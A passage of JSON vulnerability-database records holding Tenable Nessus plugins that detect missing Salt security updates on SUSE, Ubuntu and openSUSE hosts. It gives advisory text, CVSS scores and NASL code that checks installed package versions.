security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"python2-salt / python3-salt / salt / salt-api / etc\");\n}\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-01-11T15:16:24", "description": "This update for salt contains the following fixes :\n\nFix for TypeError in Tornado importer (bsc#1174165)\n\nRequire python3-distro only for TW (bsc#1173072)\n\nUpdate to Salt version 3000: See release notes:\nhttps://docs.saltstack.com/en/latest/topics/releases/3000.html\n\nAdd docker.logout to docker execution module. (bsc#1165572)\n\nAdd option to enable/disable force refresh for zypper.\n\nAdd publish_batch to ClearFuncs exposed methods.\n\nAdds test for zypper abbreviation fix.\n\nAvoid segfault from 'salt-api' under certain conditions of heavy load managing SSH minions. (bsc#1169604)\n\nAvoid traceback on debug logging for swarm module. (bsc#1172075)\n\nBatch mode now also correctly provides return value. (bsc#1168340)\n\nBetter import cache handline.\n\nDo not make file.recurse state to fail when msgpack 0.5.4.\n(bsc#1167437)\n\nDo not require vendored backports-abc. (bsc#1170288)\n\nFix errors from unit tests due NO_MOCK and NO_MOCK_REASON deprecation.\n\nFix for low rpm_lowpkg unit test.\n\nFix for temp folder definition in loader unit test.\n\nFix for unless requisite when pip is not installed.\n\nFix integration test failure for test_mod_del_repo_multiline_values.\n\nFix regression in service states with reload argument.\n\nFix tornado imports and missing _utils after rebasing patches.\n\nFix status attribute issue in aptpkg test.\n\nImproved storage pool or network handling.\n\nloop: fix variable names for until_no_eval.\n\nMake 'salt.ext.tornado.gen' to use 'salt.ext.backports_abc' on Python 2.\n\nMake setup.py script not to require setuptools greater than 9.1.\n\nMore robust remote port detection.\n\nPrevent sporious 'salt-api' stuck processes when managing SSH minions.\nbecause of logging deadlock. (bsc#1159284)\n\nPython3.8 compatibility changes.\n\nRemoves unresolved merge conflict in yumpkg module.\n\nReturns a the list of IPs filtered by the optional network list.\n\nRevert broken changes to slspath made on Salt 3000 (saltstack/salt#56341). (bsc#1170104)\n\nSanitize grains loaded from roster_grains.json cache during 'state.pkg'.\n\nVarious virt backports from 3000.2.\n\nzypperpkg: filter patterns that start with dot. (bsc#1171906)\n\nNote that Tenable Network Security has extracted the preceding description block directly from the SUSE security advisory. Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2020-07-21T00:00:00", "type": "nessus", "title": "SUSE SLED15 / SLES15 Security Update : salt (SUSE-SU-2020:1974-1)", "bulletinFamily": "scanner", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-15750", "CVE-2018-15751", "CVE-2020-11651", "CVE-2020-11652"], "modified": "2022-12-05T00:00:00", "cpe": ["p-cpe:/a:novell:suse_linux:python2-salt", "p-cpe:/a:novell:suse_linux:python3-salt", "p-cpe:/a:novell:suse_linux:salt", "p-cpe:/a:novell:suse_linux:salt-api", "p-cpe:/a:novell:suse_linux:salt-cloud", "p-cpe:/a:novell:suse_linux:salt-doc", "p-cpe:/a:novell:suse_linux:salt-master", "p-cpe:/a:novell:suse_linux:salt-minion", "p-cpe:/a:novell:suse_linux:salt-proxy", "p-cpe:/a:novell:suse_linux:salt-ssh", "p-cpe:/a:novell:suse_linux:salt-standalone-formulas-configuration", "p-cpe:/a:novell:suse_linux:salt-syndic", "cpe:/o:novell:suse_linux:15"], "id": "SUSE_SU-2020-1974-1.NASL", "href": "https://www.tenable.com/plugins/nessus/138795", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from SUSE update advisory SUSE-SU-2020:1974-1.\n# The text itself is copyright (C) SUSE.\n#\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(138795);\n script_version(\"1.10\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/12/05\");\n\n script_cve_id(\n \"CVE-2018-15750\",\n \"CVE-2018-15751\",\n \"CVE-2020-11651\",\n \"CVE-2020-11652\"\n );\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/05/03\");\n script_xref(name:\"CEA-ID\", value:\"CEA-2020-0041\");\n\n script_name(english:\"SUSE SLED15 / SLES15 Security Update : salt (SUSE-SU-2020:1974-1)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote SUSE host is missing one or more security updates.\");\n script_set_attribute(attribute:\"description\", value:\n\"This update for salt contains the following fixes :\n\nFix for TypeError in Tornado importer (bsc#1174165)\n\nRequire python3-distro only for TW (bsc#1173072)\n\nUpdate to Salt version 3000: See release notes:\nhttps://docs.saltstack.com/en/latest/topics/releases/3000.html\n\nAdd docker.logout to docker execution module. (bsc#1165572)\n\nAdd option to enable/disable force refresh for zypper.\n\nAdd publish_batch to ClearFuncs exposed methods.\n\nAdds test for zypper abbreviation fix.\n\nAvoid segfault from 'salt-api' under certain conditions of heavy load\nmanaging SSH minions. (bsc#1169604)\n\nAvoid traceback on debug logging for swarm module. (bsc#1172075)\n\nBatch mode now also correctly provides return value. (bsc#1168340)\n\nBetter import cache handline.\n\nDo not make file.recurse state to fail when msgpack 0.5.4.\n(bsc#1167437)\n\nDo not require vendored backports-abc. (bsc#1170288)\n\nFix errors from unit tests due NO_MOCK and NO_MOCK_REASON deprecation.\n\nFix for low rpm_lowpkg unit test.\n\nFix for temp folder definition in loader unit test.\n\nFix for unless requisite when pip is not installed.\n\nFix integration test failure for test_mod_del_repo_multiline_values.\n\nFix regression in service states with reload argument.\n\nFix tornado imports and missing _utils after rebasing patches.\n\nFix status attribute issue in aptpkg test.\n\nImproved storage pool or network handling.\n\nloop: fix variable names for until_no_eval.\n\nMake 'salt.ext.tornado.gen' to use 'salt.ext.backports_abc' on Python\n2.\n\nMake setup.py script not to require setuptools greater than 9.1.\n\nMore robust remote port detection.\n\nPrevent sporious 'salt-api' stuck processes when managing SSH minions.\nbecause of logging deadlock. (bsc#1159284)\n\nPython3.8 compatibility changes.\n\nRemoves unresolved merge conflict in yumpkg module.\n\nReturns a the list of IPs filtered by the optional network list.\n\nRevert broken changes to slspath made on Salt 3000\n(saltstack/salt#56341). (bsc#1170104)\n\nSanitize grains loaded from roster_grains.json cache during\n'state.pkg'.\n\nVarious virt backports from 3000.2.\n\nzypperpkg: filter patterns that start with dot. (bsc#1171906)\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the SUSE security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.suse.com/show_bug.cgi?id=1159284\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.suse.com/show_bug.cgi?id=1165572\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.suse.com/show_bug.cgi?id=1167437\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.suse.com/show_bug.cgi?id=1168340\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.suse.com/show_bug.cgi?id=1169604\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.suse.com/show_bug.cgi?id=1170104\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.suse.com/show_bug.cgi?id=1170288\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.suse.com/show_bug.cgi?id=1171906\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.suse.com/show_bug.cgi?id=1172075\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.suse.com/show_bug.cgi?id=1173072\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.suse.com/show_bug.cgi?id=1174165\");\n script_set_attribute(attribute:\"see_also\", value:\"https://docs.saltstack.com/en/latest/topics/releases/3000.html\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.suse.com/security/cve/CVE-2018-15750/\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.suse.com/security/cve/CVE-2018-15751/\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.suse.com/security/cve/CVE-2020-11651/\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.suse.com/security/cve/CVE-2020-11652/\");\n # https://www.suse.com/support/update/announcement/2020/suse-su-20201974-1\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?a0ffca24\");\n script_set_attribute(attribute:\"solution\", value:\n\"To install this SUSE Security Update use the SUSE recommended\ninstallation methods like YaST online_update or 'zypper patch'.\n\nAlternatively you can run the command listed for your product :\n\nSUSE Linux Enterprise Module for Server Applications 15-SP1 :\n\nzypper in -t patch\nSUSE-SLE-Module-Server-Applications-15-SP1-2020-1974=1\n\nSUSE Linux Enterprise Module for Python2 15-SP1 :\n\nzypper in -t patch SUSE-SLE-Module-Python2-15-SP1-2020-1974=1\n\nSUSE Linux Enterprise Module for Basesystem 15-SP1 :\n\nzypper in -t patch SUSE-SLE-Module-Basesystem-15-SP1-2020-1974=1\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2020-11651\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'SaltStack Salt Master/Minion Unauthenticated RCE');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:\"CANVAS\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2018/10/24\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2020/07/21\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2020/07/21\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:python2-salt\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:python3-salt\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:salt\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:salt-api\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:salt-cloud\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:salt-doc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:salt-master\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:salt-minion\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:salt-proxy\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:salt-ssh\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:salt-standalone-formulas-configuration\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:salt-syndic\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:suse_linux:15\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"SuSE Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2020-2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release !~ \"^(SLED|SLES)\") audit(AUDIT_OS_NOT, \"SUSE\");\nos_ver = pregmatch(pattern: \"^(SLE(S|D)\\d+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"SUSE\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^(SLED15|SLES15)$\", string:os_ver)) audit(AUDIT_OS_NOT, \"SUSE SLED15 / SLES15\", \"SUSE \" + os_ver);\n\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (cpu !~ \"^i[3-6]86$\" && \"x86_64\" >!< cpu && \"s390x\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"SUSE \" + os_ver, cpu);\n\nsp = get_kb_item(\"Host/SuSE/patchlevel\");\nif (isnull(sp)) sp = \"0\";\nif (os_ver == \"SLES15\" && (! preg(pattern:\"^(1)$\", string:sp))) audit(AUDIT_OS_NOT, \"SLES15 SP1\", os_ver + \" SP\" + sp);\nif (os_ver == \"SLED15\" && (! preg(pattern:\"^(1)$\", string:sp))) audit(AUDIT_OS_NOT, \"SLED15 SP1\", os_ver + \" SP\" + sp);\n\n\nflag = 0;\nif (rpm_check(release:\"SLES15\", sp:\"1\", reference:\"python2-salt-3000-6.37.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"1\", reference:\"python3-salt-3000-6.37.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"1\", reference:\"salt-3000-6.37.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"1\", reference:\"salt-api-3000-6.37.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"1\", reference:\"salt-cloud-3000-6.37.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"1\", reference:\"salt-doc-3000-6.37.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"1\", reference:\"salt-master-3000-6.37.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"1\", reference:\"salt-minion-3000-6.37.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"1\", reference:\"salt-proxy-3000-6.37.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"1\", reference:\"salt-ssh-3000-6.37.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"1\", reference:\"salt-standalone-formulas-configuration-3000-6.37.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"1\", reference:\"salt-syndic-3000-6.37.1\")) flag++;\nif (rpm_check(release:\"SLED15\", sp:\"1\", reference:\"python2-salt-3000-6.37.1\")) flag++;\nif (rpm_check(release:\"SLED15\", sp:\"1\", reference:\"python3-salt-3000-6.37.1\")) flag++;\nif (rpm_check(release:\"SLED15\", sp:\"1\", reference:\"salt-3000-6.37.1\")) flag++;\nif (rpm_check(release:\"SLED15\", sp:\"1\", reference:\"salt-doc-3000-6.37.1\")) flag++;\nif (rpm_check(release:\"SLED15\", sp:\"1\", reference:\"salt-minion-3000-6.37.1\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"salt\");\n}\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-01-14T14:56:48", "description": "It was discovered that Salt allows remote attackers to determine which files exist on the server. An attacker could use that to extract sensitive information. (CVE-2018-15750) It was discovered that Salt has a vulnerability that allows an user to bypass authentication. An attacker could use that to extract sensitive information, execute abritrary code or crash the server. (CVE-2018-15751) It was discovered that Salt is vulnerable to command injection. This allows an unauthenticated attacker with network access to the API endpoint to execute arbitrary code on the salt-api host. (CVE-2019-17361) It was discovered that Salt incorrectly validated method calls and sanitized paths. A remote attacker could possibly use this issue to access some methods without authentication. (CVE-2020-11651, CVE-2020-11652).\n\nNote that Tenable Network Security has extracted the preceding description block directly from the Ubuntu security advisory. Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2020-08-18T00:00:00", "type": "nessus", "title": "Ubuntu 16.04 LTS / 18.04 LTS : Salt vulnerabilities (USN-4459-1)", "bulletinFamily": "scanner", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-15750", "CVE-2018-15751", "CVE-2019-17361", "CVE-2020-11651", "CVE-2020-11652"], "modified": "2023-01-12T00:00:00", "cpe": ["p-cpe:/a:canonical:ubuntu_linux:salt-api", "p-cpe:/a:canonical:ubuntu_linux:salt-common", "p-cpe:/a:canonical:ubuntu_linux:salt-master", "p-cpe:/a:canonical:ubuntu_linux:salt-minion", "cpe:/o:canonical:ubuntu_linux:16.04", "cpe:/o:canonical:ubuntu_linux:18.04:-:lts"], "id": "UBUNTU_USN-4459-1.NASL", "href": "https://www.tenable.com/plugins/nessus/139659", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Ubuntu Security Notice USN-4459-1. The text \n# itself is copyright (C) Canonical, Inc. See \n# <http://www.ubuntu.com/usn/>. Ubuntu(R) is a registered \n# trademark of Canonical, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(139659);\n script_version(\"1.10\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2023/01/12\");\n\n script_cve_id(\"CVE-2018-15750\", \"CVE-2018-15751\", \"CVE-2019-17361\", \"CVE-2020-11651\", \"CVE-2020-11652\");\n script_xref(name:\"USN\", value:\"4459-1\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/05/03\");\n script_xref(name:\"CEA-ID\", value:\"CEA-2020-0041\");\n\n script_name(english:\"Ubuntu 16.04 LTS / 18.04 LTS : Salt vulnerabilities (USN-4459-1)\");\n script_summary(english:\"Checks dpkg output for updated packages.\");\n\n script_set_attribute(\n attribute:\"synopsis\",\n value:\n\"The remote Ubuntu host is missing one or more security-related\npatches.\"\n );\n script_set_attribute(\n attribute:\"description\",\n value:\n\"It was discovered that Salt allows remote attackers to determine which\nfiles exist on the server. An attacker could use that to extract\nsensitive information. (CVE-2018-15750) It was discovered that Salt\nhas a vulnerability that allows an user to bypass authentication. An\nattacker could use that to extract sensitive information, execute\nabritrary code or crash the server. (CVE-2018-15751) It was discovered\nthat Salt is vulnerable to command injection. This allows an\nunauthenticated attacker with network access to the API endpoint to\nexecute arbitrary code on the salt-api host. (CVE-2019-17361) It was\ndiscovered that Salt incorrectly validated method calls and sanitized\npaths. A remote attacker could possibly use this issue to access some\nmethods without authentication. (CVE-2020-11651, CVE-2020-11652).\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Ubuntu security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://usn.ubuntu.com/4459-1/\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2020-11651\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'SaltStack Salt Master/Minion Unauthenticated RCE');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:'CANVAS');\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:salt-api\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:salt-common\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:salt-master\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:salt-minion\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:canonical:ubuntu_linux:16.04\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:canonical:ubuntu_linux:18.04:-:lts\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2018/10/24\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2020/08/13\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2020/08/18\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"Ubuntu Security Notice (C) 2020-2023 Canonical, Inc. / NASL script (C) 2020-2023 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Ubuntu Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/cpu\", \"Host/Ubuntu\", \"Host/Ubuntu/release\", \"Host/Debian/dpkg-l\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"ubuntu.inc\");\ninclude(\"misc_func.inc\");\n\nif ( ! get_kb_item(\"Host/local_checks_enabled\") ) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/Ubuntu/release\");\nif ( isnull(release) ) audit(AUDIT_OS_NOT, \"Ubuntu\");\nvar release = chomp(release);\nif (! preg(pattern:\"^(16\\.04|18\\.04)$\", string:release)) audit(AUDIT_OS_NOT, \"Ubuntu 16.04 / 18.04\", \"Ubuntu \" + release);\nif ( ! get_kb_item(\"Host/Debian/dpkg-l\") ) audit(AUDIT_PACKAGE_LIST_MISSING);\n\nvar cpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif ('x86_64' >!< cpu && cpu !~ \"^i[3-6]86$\" && 's390' >!< cpu && 'aarch64' >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, 'Ubuntu', cpu);\n\nvar flag = 0;\n\nif (ubuntu_check(osver:\"16.04\", pkgname:\"salt-api\", pkgver:\"2015.8.8+ds-1ubuntu0.1\")) flag++;\nif (ubuntu_check(osver:\"16.04\", pkgname:\"salt-common\", pkgver:\"2015.8.8+ds-1ubuntu0.1\")) flag++;\nif (ubuntu_check(osver:\"16.04\", pkgname:\"salt-master\", pkgver:\"2015.8.8+ds-1ubuntu0.1\")) flag++;\nif (ubuntu_check(osver:\"16.04\", pkgname:\"salt-minion\", pkgver:\"2015.8.8+ds-1ubuntu0.1\")) flag++;\nif (ubuntu_check(osver:\"18.04\", pkgname:\"salt-api\", pkgver:\"2017.7.4+dfsg1-1ubuntu18.04.2\")) flag++;\nif (ubuntu_check(osver:\"18.04\", pkgname:\"salt-common\", pkgver:\"2017.7.4+dfsg1-1ubuntu18.04.2\")) flag++;\nif (ubuntu_check(osver:\"18.04\", pkgname:\"salt-master\", pkgver:\"2017.7.4+dfsg1-1ubuntu18.04.2\")) flag++;\nif (ubuntu_check(osver:\"18.04\", pkgname:\"salt-minion\", pkgver:\"2017.7.4+dfsg1-1ubuntu18.04.2\")) flag++;\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : ubuntu_report_get()\n );\n exit(0);\n}\nelse\n{\n var tested = ubuntu_pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"salt-api / salt-common / salt-master / salt-minion\");\n}\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-01-11T14:50:26", "description": "The remote SUSE Linux SUSE15 host has packages installed that are affected by multiple vulnerabilities as referenced in the openSUSE-SU-2021:0899-1 advisory.\n\n - Directory Traversal vulnerability in salt-api in SaltStack Salt before 2017.7.8 and 2018.3.x before 2018.3.3 allows remote attackers to determine which files exist on the server. (CVE-2018-15750)\n\n - SaltStack Salt before 2017.7.8 and 2018.3.x before 2018.3.3 allow remote attackers to bypass authentication and execute arbitrary commands via salt-api(netapi). (CVE-2018-15751)\n\n - An issue was discovered in SaltStack Salt before 2019.2.4 and 3000 before 3000.2. The salt-master process ClearFuncs class does not properly validate method calls. This allows a remote user to access some methods without authentication. These methods can be used to retrieve user tokens from the salt master and/or run arbitrary commands on salt minions. (CVE-2020-11651)\n\n - An issue was discovered in SaltStack Salt before 2019.2.4 and 3000 before 3000.2. The salt-master process ClearFuncs class allows access to some methods that improperly sanitize paths. These methods allow arbitrary directory access to authenticated users. (CVE-2020-11652)\n\n - In SaltStack Salt through 3002, salt-netapi improperly validates eauth credentials and tokens. A user can bypass authentication and invoke Salt SSH. (CVE-2020-25592)\n\n - A Incorrect Implementation of Authentication Algorithm vulnerability in of SUSE SUSE Linux Enterprise Server 15 SP 3; openSUSE Tumbleweed allows local attackers to execute arbitrary code via salt without the need to specify valid credentials. This issue affects: SUSE SUSE Linux Enterprise Server 15 SP 3 salt versions prior to 3002.2-3. openSUSE Tumbleweed salt version 3002.2-2.1 and prior versions.\n (CVE-2021-25315)\n\n - In SaltStack Salt 2016.9 through 3002.6, a command injection vulnerability exists in the snapper module that allows for local privilege escalation on a minion. The attack requires that a file is created with a pathname that is backed up by snapper, and that the master calls the snapper.diff function (which executes popen unsafely). (CVE-2021-31607)\n\nNote that Nessus has not tested for this issue but has instead relied only on the application's self-reported version number.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-06-28T00:00:00", "type": "nessus", "title": "openSUSE 15 Security Update : salt (openSUSE-SU-2021:0899-1)", "bulletinFamily": "scanner", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-15750", "CVE-2018-15751", "CVE-2020-11651", "CVE-2020-11652", "CVE-2020-25592", "CVE-2021-25315", "CVE-2021-31607"], "modified": "2022-12-05T00:00:00", "cpe": ["p-cpe:/a:novell:opensuse:python3-salt", 